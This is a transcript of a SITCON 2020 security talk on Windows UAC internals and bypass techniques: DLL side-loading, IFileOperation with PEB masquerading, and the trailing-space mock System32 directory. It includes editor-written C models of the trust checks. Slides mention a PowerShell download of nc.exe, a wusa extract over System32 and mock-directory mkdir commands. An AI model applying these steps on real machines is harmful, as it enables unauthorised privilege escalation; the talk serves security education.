
SITCON: Playing Win32 Like a K!NG ;)

adr
August 08, 2020


Since Windows Vista the operating system has shipped with UAC (User Account Control), which was meant to be one of its more important anti-malware protections, blocking the malicious actions of unknown programs on our behalf. The sad reality is that the UAC service has turned out to be little more than an annoying consent pop-up that fails to stop countless malware attacks.

This talk gives a quick tour of the Maginot Line of Microsoft's protection model on Windows, how Win32 processes are loaded, a reverse-engineered look at the UAC implementation, the security assumptions Microsoft made when designing UAC, and how the masters have been blowing past your UAC protection.

sysDoor: gist.github.com/aaaddress1/6c4276155104a5b7df9ab15221c91f69


Transcript

  1. SITCON 2020
    Playing Win32 Like a K!NG ;)
    (title slide background: truncated PowerShell fragments of a WebClient download of nc.exe from 10.10.10.10 and a Base64-encoded "cmd.exe /c" command line)

  2. #Windows #Reversing #Pwn #Exploit
    $man
    • Master's degree at CSIE, NTUST
    • Security Researcher - chrO.ot
    • Speaker - BlackHat, DEFCON, VXCON, HITCON
    • Hao's Arsenal

  3. /?outline
    1. UAC Design
    2. Exploit Attacks
       1. Misc Method
       2. CIA Vault7: Elevated COM Object Method
       3. UAC Bypass by Mocking Trusted Directories
    3. Recap

  4. (architecture diagram) Ring3: Explorer --RPC--> UAC service --> consent.exe --> privileged child process; Ring0 sits below the syscall boundary
    (A.) RunAs the UAC Service
    (B.) Send a task by RPC message to the UAC service, which creates a child process at a different privilege level
    Two checks, trust_authA and trust_authB, sit between the RPC request, consent.exe and the privileged child process

  5. /?auth_a
    • TrustAuth_A  # trust-path verification
      - $p = ToNtPath("C:\\a.exe")   # → \??\C:\a.exe
      - $p.startswith("\??\C:\Windows\System32") or
        $p.startswith("\??\C:\Windows\SysWoW64")
      - not on the deny-list

  6. /?auth_b
    • TrustAuth_B
      - whitelisted *.exe carrying a Microsoft signature
      - or <autoElevate>true</autoElevate> in the application manifest (manifest.xml)

  7. /?Bypass
    • UAC: "What the Emperor does not grant, you shall not take!"
    • TrustAuth_A  # is the binary from the trusted zone?
      A. launched from the system directory
      B. whitelisted + signed by Microsoft
    • TrustAuth_B  # should it be elevated?
      C. marked auto-elevate or whitelisted
    PS C:\> sigcheck.exe -m C:\Windows\System32\Taskmgr.exe
    So now... we have a nice list of targets

  8. /?attack
    • Misc: tricks seen in the wild ✨
    • CIA: Elevated COM Object Method
    • Mocking Trusted Directories

  9. /?misc#1
    Accessing Access Tokens for UIAccess
    www.tiraniddo.dev/2019/02/accessing-access-tokens-for-uiaccess.html
    Have it click "Yes" for you? Easy enough.

  10. /?misc#2
    • Can we get a high-privilege service to call us directly?
    • Bypassing UAC on Windows 10 using Disk Cleanup
      enigma0x3.net/2016/07/22/bypassing-uac-on-windows-10-using-disk-cleanup

  11. /?misc#3
    • Extract an archive straight over the system binaries
      $ wusa hack.cab /extract:C:\Windows\System32
      msitpros.com/?p=3100
      Note: Microsoft has since removed the /extract switch from wusa.exe on Windows 10, so this route is closed on current builds.

  12. /?hijack
    (diagram) a.exe on disk: 'PE' signature, optional header (.EntryPoint, .ImageBase), section data (.text, .rdata, .idata)
    → in the process: PEB, the PE module itself, then the imported modules ntdll.dll, VERSION.dll, user32.dll, ... brought in via LoadLibrary()
    LoadLibrary() search order for VERSION.dll when the EXE is C:\hijack\a.exe:
    $PATH: {
      "C:\hijack\VERSION.dll",
      "C:\Windows\System32\VERSION.dll",
      "C:\Windows\SysWoW64\VERSION.dll",
      ...
    }

  13. /?bypass#1
    • DLL Side-Loading
      → hijack auto-elevated Windows binaries by dropping a malicious *.dll next to them
    • IFileOperation
      → arbitrary file write if the caller looks like Explorer (the elevated COM object is auto-approved for it)
      → drop a *.dll into C:\Windows\System32 to hijack
    • DLL Injection
      → do things as Explorer
    https://github.com/hjc4869/UacBypass
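
Added example for slides 12 and 13, written by the editor and not taken from the deck or from hjc4869/UacBypass: a portable C model of the loader's search order and of where a low-privileged writer can plant a DLL to win it. The model file system, the KnownDLLs subset and the placeholder import name PHANTOM.dll are constructed; the real import that cliconfg.exe pulls in (slide 14) is not named on this page, so it is not named here either.

```c
/* Editor's model of the LoadLibrary search order on slide 12 and the
 * side-loading / missing-DLL cases on slide 13.  Not code from the deck.
 * The "file system", KnownDLLs subset and PHANTOM.dll are constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define SYSTEM32 "C:\\Windows\\System32"
#define SYSWOW64 "C:\\Windows\\SysWoW64"

struct file { const char *dir; const char *name; };

/* Constructed model file system.  PHANTOM.dll is deliberately absent: it
 * stands for a DLL that an auto-elevated target imports but System32 does
 * not ship (the cliconfg.exe case of slide 14; the name is a placeholder). */
static const struct file FILES[] = {
    { SYSTEM32, "VERSION.dll" },
    { SYSWOW64, "VERSION.dll" },
    { SYSTEM32, "kernel32.dll" },
};

/* Constructed subset of KnownDLLs: the loader maps these from the
 * \KnownDlls section and never walks the search path for them. */
static const char *KNOWN_DLLS[] = { "ntdll.dll", "kernel32.dll", "user32.dll" };

static int ieq(const char *a, const char *b)          /* case-insensitive == */
{
    for (; *a && *b; a++, b++)
        if (tolower((unsigned char)*a) != tolower((unsigned char)*b)) return 0;
    return *a == *b;
}

static int file_exists(const char *dir, const char *name)
{
    for (size_t i = 0; i < sizeof FILES / sizeof *FILES; i++)
        if (ieq(FILES[i].dir, dir) && ieq(FILES[i].name, name)) return 1;
    return 0;
}

static int is_known_dll(const char *name)
{
    for (size_t i = 0; i < sizeof KNOWN_DLLS / sizeof *KNOWN_DLLS; i++)
        if (ieq(KNOWN_DLLS[i], name)) return 1;
    return 0;
}

/* Slide 12's $PATH for an EXE living in app_dir: its own directory first,
 * then System32, then SysWoW64.  Returns the directory the loader would
 * take `name` from, or NULL when the import cannot be satisfied. */
const char *resolve_dll(const char *app_dir, const char *name)
{
    if (is_known_dll(name)) return SYSTEM32;
    const char *order[] = { app_dir, SYSTEM32, SYSWOW64 };
    for (size_t i = 0; i < 3; i++)
        if (file_exists(order[i], name)) return order[i];
    return NULL;
}

/* First directory on the search path where the attacker can drop `name`
 * before the loader meets a legitimate copy, or NULL if no hijack exists.
 * app_dir_writable is 1 when the attacker controls the EXE's directory: a
 * copy of the target in C:\hijack (slide 12), or System32 itself when the
 * write goes through IFileOperation as Explorer (slides 13 and 19).
 * Existing files are never overwritable in the model: System32 binaries
 * belong to TrustedInstaller. */
const char *hijack_dir(const char *app_dir, int app_dir_writable, const char *name)
{
    if (is_known_dll(name)) return NULL;
    const char *order[] = { app_dir, SYSTEM32, SYSWOW64 };
    const int writable[] = { app_dir_writable, 0, 0 };
    for (size_t i = 0; i < 3; i++) {
        if (file_exists(order[i], name)) return NULL;   /* legit copy wins */
        if (writable[i]) return order[i];               /* plant it here   */
    }
    return NULL;
}

static const char *show(const char *dir) { return dir ? dir : "no hijack"; }

int main(void)
{
    /* Slide 12: copy a.exe to C:\hijack -> VERSION.dll is hijackable, but the
     * EXE is now outside the trusted zone, so it will not auto-elevate. */
    printf("C:\\hijack a.exe, VERSION.dll              -> %s\n", show(hijack_dir("C:\\hijack", 1, "VERSION.dll")));
    /* Slide 14: the target stays in System32 and imports a DLL missing there;
     * only an Explorer-level write into System32 makes it hijackable. */
    printf("System32 target, PHANTOM.dll, user write   -> %s\n", show(hijack_dir(SYSTEM32, 0, "PHANTOM.dll")));
    printf("System32 target, PHANTOM.dll, Explorer wr. -> %s\n", show(hijack_dir(SYSTEM32, 1, "PHANTOM.dll")));
    /* KnownDLLs are immune whatever the search order says. */
    printf("C:\\hijack a.exe, kernel32.dll             -> %s\n", show(hijack_dir("C:\\hijack", 1, "kernel32.dll")));
    return 0;
}
```

The four printed cases are the ones the slides walk through: the C:\hijack copy wins the search for VERSION.dll but sits outside the trusted zone, which is exactly why the real chain needs the System32 write that IFileOperation-as-Explorer provides; a DLL that System32 does not ship is hijackable only once that write exists; and a KnownDLL cannot be hijacked from any directory.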


  14. /?bypass#1
    (diagram) malware → explorer.exe process (ntdll.dll, kernel32.dll, user32.dll, malware.dll) → system32\cliconfg.exe
    (a.) inject a *.dll module into explorer.exe
    (b.) create a new thread to wake the malware up
    (c.) drop a *.dll into %system32% to hijack the target
    (d.) get privileged via the DLL hijack

  15. /?bypass4what
    • Change the Windows product key
      → the hacker can install a genuine Windows for you!
    • Run the disk management tool
      → PC slow, too much junk? the hacker will defragment your disk for you
    • Remove your antivirus
      → think the AV slows your PC down? no problem, the hacker will delete it (⁎⁍̴̛ᴗ⁍̴̛⁎)
    • Write an autorun entry
      → the hacker can plant a backdoor that runs at boot and watches after you ;)

  16. /?MasqueradePEB
    (diagram) Source.cpp → Compiler → PE on disk ('MZ', optional header with ImageBase, .text, .rdata, .idata) → Application Loader → running process (EntryPoint, PEB, PE module)
    The PEB carries the image path the loader recorded; rewriting it to "C:\Windows\explorer.exe" makes the process look like Explorer to any check that trusts the PEB

  17. /?bypass#2
    • DLL Side-Loading
      → hijack auto-elevated Windows binaries by dropping a malicious *.dll next to them
    • IFileOperation + MasqueradePEB
      → arbitrary file write as Explorer, with no injection into explorer.exe needed
      → drop a *.dll into C:\Windows\System32 to hijack

  18. /?bypass#1
    (repeat of slide 14: the injection-based flow, shown again for comparison with slide 19)

  19. /?bypass#2
    (diagram) malware.exe process (ntdll.dll, kernel32.dll, user32.dll) with its PEB image path rewritten to "C:\Windows\explorer.exe" → system32\cliconfg.exe
    (a.) masquerade the current image path as explorer.exe in the PEB
    (b.) drop a *.dll into %system32% to hijack the target
    (c.) get privileged via the DLL hijack

  20. /?WikiLeaks
    Vault 7: CIA Hacking Tools Revealed
    wikileaks.org/ciav7p1/cms/page_3375231.html

  21. /?IFileOperation
    http://d1iv3.me/2017/08/11/Bypass-UAC-方法研究/


  24. /?WikiLeaks
    Vault 7: CIA Hacking Tools Revealed
    wikileaks.org/ciav7p1/cms/page_3375231.html
    Microsoft patched this after Windows 10 version 1607 (including the known hijackable *.dlls)


  26. 〉〉〉 Mocking Directory

  27. (repeat of slide 4: the Explorer → RPC → UAC service → consent.exe → privileged child process diagram)

  28. /?Bypass
    (repeat of slide 7: TrustAuth_A / TrustAuth_B conditions and the sigcheck.exe -m target list)

  29. /?DACL
    $ mkdir "C:\Windows \"
    $ mkdir "C:\Windows \System32"
    The trailing space after "Windows" is the whole point. Win32 path normalisation strips a trailing space from a directory name, so the mock directory has to be created through a \\?\-prefixed path (or the native API) for the space to survive; a plain mkdir may silently give you the real C:\Windows.

  30. /?auth_a
    (repeat of slide 5: the TrustAuth_A trust-path check)

  31. /?auth_a
    AiLaunchProcess(L"C:\Windows \System32\a.exe")
    RtlDosPathNameToRelativeNtPathName_U_WithStatus(
        GetLongPathNameW(L"C:\Windows \System32\a.exe")
    )
    → GetLongPathNameW strips the trailing space, so what the service actually converts is:
    RtlDosPathNameToRelativeNtPathName_U_WithStatus(
        L"C:\Windows\System32\a.exe"
    )
    $p = L"\??\C:\Windows\System32\a.exe"
    → passes the TrustAuth_A prefix check, although the binary really lives in "C:\Windows \System32"
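
Added example for slides 5, 6, 29 and 31, written by the editor and not code from the deck or from appinfo.dll: a portable C model of the two trust checks that shows why normalising the path before the prefix test lets the mock directory through. win32_normalize and to_nt_path stand in for GetLongPathNameW and RtlDosPathNameToRelativeNtPathName_U_WithStatus; the manifest text is constructed; the strict variant is the editor's own illustration of checking the un-normalised path and says nothing about what Microsoft's actual fix looks like; the deny-list from slide 5 is left out of the model.

```c
/* Editor's model of TrustAuth_A (slides 5, 31) and TrustAuth_B (slide 6).
 * Not code from the deck.  All paths and the manifest are constructed. */
#include <stdio.h>
#include <string.h>
#include <ctype.h>

#define MAXPATH 512

/* Model of what GetLongPathNameW does on slide 31: Win32 normalisation
 * drops trailing spaces and dots from each component, so
 * "C:\Windows \System32\a.exe" comes back as "C:\Windows\System32\a.exe". */
static void win32_normalize(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    const char *p = in;
    while (*p && n + 1 < outsz) {
        const char *end = p;                 /* end of this path component */
        while (*end && *end != '\\') end++;
        const char *trim = end;              /* strip trailing ' ' and '.' */
        while (trim > p && (trim[-1] == ' ' || trim[-1] == '.')) trim--;
        size_t len = (size_t)(trim - p);
        if (len > outsz - 1 - n) len = outsz - 1 - n;
        memcpy(out + n, p, len);
        n += len;
        if (*end == '\\' && n + 1 < outsz) out[n++] = '\\';
        p = *end ? end + 1 : end;
    }
    out[n] = '\0';
}

/* Model of RtlDosPathNameToRelativeNtPathName_U_WithStatus for a plain
 * drive-letter path: "C:\x" -> "\??\C:\x" (slide 5). */
static void to_nt_path(const char *dos, char *out, size_t outsz)
{
    snprintf(out, outsz, "\\??\\%s", dos);
}

static int starts_with_ci(const char *s, const char *prefix)
{
    for (; *prefix; s++, prefix++)
        if (tolower((unsigned char)*s) != tolower((unsigned char)*prefix))
            return 0;
    return 1;
}

/* Trusted zone from slide 5.  The trailing backslash is deliberate: without
 * it "\??\C:\Windows\System32Evil\x.exe" would pass a bare startswith. */
static const char *TRUSTED[] = { "\\??\\C:\\Windows\\System32\\",
                                 "\\??\\C:\\Windows\\SysWoW64\\" };

static int in_trusted_dir(const char *nt)
{
    for (size_t i = 0; i < sizeof TRUSTED / sizeof *TRUSTED; i++)
        if (starts_with_ci(nt, TRUSTED[i])) return 1;
    return 0;
}

/* TrustAuth_A as slide 31 reconstructs it: normalise, convert, prefix-check.
 * The mock directory passes because the space is gone before the check. */
int trust_auth_a_normalized(const char *dos_path)
{
    char norm[MAXPATH], nt[MAXPATH];
    win32_normalize(dos_path, norm, sizeof norm);
    to_nt_path(norm, nt, sizeof nt);
    return in_trusted_dir(nt);
}

/* Strict variant, for the model only: test the path exactly as the kernel
 * will open it, so "\??\C:\Windows \System32\a.exe" fails the prefix test. */
int trust_auth_a_strict(const char *dos_path)
{
    char nt[MAXPATH];
    to_nt_path(dos_path, nt, sizeof nt);
    return in_trusted_dir(nt);
}

/* TrustAuth_B (slide 6): Microsoft-signed, and either whitelisted or carrying
 * <autoElevate>true</autoElevate> in its manifest.  The signature travels
 * with the file: a copy of Taskmgr.exe in the mock directory is still
 * Microsoft-signed and still marked auto-elevate. */
int trust_auth_b(int ms_signed, int whitelisted, const char *manifest)
{
    int auto_elevate = 0;
    const char *tag = manifest ? strstr(manifest, "<autoElevate>") : NULL;
    if (tag) {
        tag += strlen("<autoElevate>");
        while (isspace((unsigned char)*tag)) tag++;
        auto_elevate = starts_with_ci(tag, "true");
    }
    return ms_signed && (whitelisted || auto_elevate);
}

/* The whole decision; use_normalization selects the slide-31 behaviour. */
int would_auto_elevate(const char *dos_path, int ms_signed, int whitelisted,
                       const char *manifest, int use_normalization)
{
    int a = use_normalization ? trust_auth_a_normalized(dos_path)
                              : trust_auth_a_strict(dos_path);
    return a && trust_auth_b(ms_signed, whitelisted, manifest);
}

int main(void)
{
    const char *mock = "C:\\Windows \\System32\\a.exe";       /* slide 29 */
    const char *manifest = "<autoElevate>true</autoElevate>";  /* constructed */
    printf("normalised (slide 31): %d\n", would_auto_elevate(mock, 1, 0, manifest, 1));
    printf("strict model:          %d\n", would_auto_elevate(mock, 1, 0, manifest, 0));
    return 0;
}
```

Two details carry the lesson: TrustAuth_B never looks at the location, so a signed auto-elevate binary copied into the mock directory still satisfies it, and the only thing standing between the copy and an elevated process is the string comparison in TrustAuth_A, which the normalisation step quietly rewrites in the attacker's favour.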


  32. /?attack
    • TrustAuth_A
      - path normalisation issues
    • TrustAuth_B
      - whitelisted EXE files with a trusted signature
      - EXE files marked auto-elevate
      → DLL side-loading tricks to hijack those Windows binaries
    • UAC Bypass by Mocking Trusted Directories

  33. /?HITCON
    www.youtube.com/watch?v=6LUo-Crd9pc

  34. /?recap
    • UAC Design
      - auth_a: *.exe launched from the system directory
      - auth_b: marked as AutoElevate
    • Bypass Tricks
      - issues: IFileOperation, path normalisation
      - DLL side-loading
      - code injection / MasqueradePEB
      - DEFCON 25: UAC 0day, all day! by @FuzzySec

  35. Thanks!
    (closing slide: the same truncated PowerShell/Base64 background as slide 1, captioned 情報滲透 (intelligence infiltration), 遠程後門 (remote backdoor), 網軍行動 (cyber-army operations))
    Slides / Github @aaaddress1 / Facebook